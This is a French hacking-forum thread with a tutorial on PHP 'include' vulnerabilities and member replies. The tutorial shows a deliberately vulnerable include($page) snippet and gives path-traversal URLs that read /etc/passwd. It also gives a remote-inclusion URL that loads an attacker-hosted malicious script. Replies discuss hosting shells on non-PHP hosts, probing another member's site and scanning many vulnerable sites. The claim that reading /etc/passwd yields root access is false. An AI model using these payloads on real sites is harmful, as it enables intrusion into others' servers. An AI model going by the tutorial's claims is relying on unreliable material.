Annonce

Réduire
Aucune annonce.

La Faille Include

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • La Faille Include

    La Faille Include :

    1.1 Présentation :
    Le Langage PHP est le langage le plus répandu sur le net mais aussi le plus puissant car il prend Control de la quasi-totalité du serveur. L’include () est l’une des fonctions PHP les plus utilisées sur La toile, elle permet l’appel de pages depuis une autre. Exemple : Admettons que toutes vos Pages utilisent la page sql.php dans laquelle sont contenus vos informations SQL, il convient de L’inclure dans chacune de vos pages plutôt que de retaper l’équivalent de sql.php dans toutes vos Pages. Voici donc un exemple pour mieux éclaircir :
    L’url du site : http://www.site.com/index.php?page=contact.php
    La page index.php ici aurait la structure suivante :
    Code:
    <?
    include("sql.php");
    include($page);
    include("footer.php");
    ?>
    Ainsi toutes les pages appelées par index.php de l’url (comme l’exemple ci-dessus ) incluraient Automatiquement le fichier sql.php

    1.2 Exploitation :
    Il y a deux manières d’exploiter la faille Include :

    Exploitation Interne :
    Reprenons notre Exemple : http://www.site.com/index.php?page=contact.php
    Ici la page index.php recevait comme paramètre la page contact.php pour ensuite l’inclure ,donc Si on remplace contact.php par un fichier sensible existant sur le serveur, index.php l’inclurai ce Qui nous permettrai de le lire .Voici quelques exemples :
    Code:
    http://www.site.com/index.php?page=/etc/passwd
    http://www.site.com/index.php?page=../../../../../../../etc/passwd
    Ici le site afficherais le contenu du repertoire /etc/passwd, ou se trouvent les comptesAdministrateurs, ce qui vous permettrais d’avoir : un accès root sur le serveur.

    Exploitation Externe :
    Reprenons encore une fois notre Exemple : http://www.site.com/index.php?page=contact.php
    Ce genre d’exploitation est le plus courant, ici c’est un script PHP hébergé sur notre propre Serveur qu’on pourrait inclure a l’aide d’un appel extérieur de la sorte :
    http://www.site.com/index.php?page=h...-malfesant.php
    Comme vous l’avez surement compris votre « script-malfaisant » s’occupera du reste, il y a Plusieurs possibilités, des connaissances en PHP s’imposent, ce qui n’est pas l’objet de notre Tutorial.

    1.3 Conclusion :
    La Faille Include est une faille très répandue sur le net ce qui fait d’elle une faille dangereuse Pour les webmasters qui vise l’index de leur site et aussi leur statut « root » .
    " Une teuf sans drogue c'est comme une levrette sans fessé, c'est quand même rare. "

    †|

  • #2
    Meh, même en faisant exprès d'en mettre une sur mon site, j'ai pas réussi. Pas moyen de faire exécuter le code php sur le serveur cible...

    (Ps : bandes de petits malin, vous pouvez essayer, mais faille il n'y a plus !)

    Commentaire


    • #3
      J'ai tenté un exploit sur ton site et j'me suis fait traiter de con

      Espèce d'enfoiré, ça m'a fait refroidir mais ça m'a bien fait marrer
      sigpic

      Cyprium Download Link

      Plus j'étudie plus j'me rends compte que je n'sais rien.

      †|

      Commentaire


      • #4
        Envoyé par SAKAROV Voir le message
        J'ai tenté un exploit sur ton site et j'me suis fait traiter de con

        Espèce d'enfoiré, ça m'a fait refroidir mais ça m'a bien fait marrer
        Ahah, excellent ! =D

        Commentaire


        • #5
          Merci pour le tuto mais je tiens a préciser que le fichier ''malfesant'' ne doit pas être en *.php sinon ton serveur l'exécutra avant que le serveur de la victime l'affiche ce qui reviendrait à se hack soi-même.
          La faille la plus exploitable est la faille humaine.

          Commentaire


          • #6
            Envoyé par SShady Voir le message
            Merci pour le tuto mais je tiens a préciser que le fichier ''malfesant'' ne doit pas être en *.php sinon ton serveur l'exécutra avant que le serveur de la victime l'affiche ce qui reviendrait à se hack soi-même.
            Si tu dis ça par rapport à mon post, j'ai essayé toutes les configurations ! En ajoutant des valeurs de fin de chaines, avec une extension en php, en txt, sans extension du tout... Rien n'a marché. Mais il me semble qu'il faut que le serveur soit configuré de manière à pouvoir exécuter du remote code. Plus exactement, il faut que ca n'ai pas été désactivé. C'est vrai que j'ai pas checké mon phpinfo...

            Commentaire


            • #7
              En effet, mais il reste un autre moyen qui est de créer sa page ''malfesante'' via un hébergeur qui ne tient pas compte du php.
              La faille la plus exploitable est la faille humaine.

              Commentaire


              • #8
                Yeahp, c'est ce que j'ai fait en hébergeant le shell sur les pages perso orange, qui n'autorisent pas le php... Rien à faire, cette faille reste un mystère ! Je réessayerai un jour...

                Commentaire


                • #9
                  D'accord tient moi au courrant !
                  La faille la plus exploitable est la faille humaine.

                  Commentaire


                  • #10
                    Bon, je me suis créé un petite faille sur le serveur et comme je l'avais supposé, il n'est pas vulnérable à l'inclusion d'URL externe...
                    Warning: include() [function.include]: URL file-access is disabled in the server configuration in [...]
                    Donc remote file inclusion, c'est mort. Ca empeche pas de naviguer pour inclure un htaccess ou htpasswd ceci dit.

                    Je pouvais toujours essayer...

                    (Ps: bande de malins, la faille est déjà bouchée !)
                    Dernière modification par comaX, 17 janvier 2012, 15h57.

                    Commentaire


                    • #11
                      Nous avons scannés d nombreux sites faillibles à de nombreuses failles différentes. Cependant, au Level I, c'est des choses très... basiques. Il va falloir attendre le L2 voir L3 pour les avoir. Y'en a des centaines t'inquiètes pas
                      sigpic

                      Cyprium Download Link

                      Plus j'étudie plus j'me rends compte que je n'sais rien.

                      †|

                      Commentaire


                      • #12
                        Non les faille include sont toujour assez répandues sur le net ; )

                        Au passage merci du tutorial Mantra ; )
                        Dernière modification par comaX, 17 janvier 2012, 15h56.

                        Commentaire


                        • #13
                          je déplace level 2
                          sigpic

                          Commentaire

                          Chargement...
                          X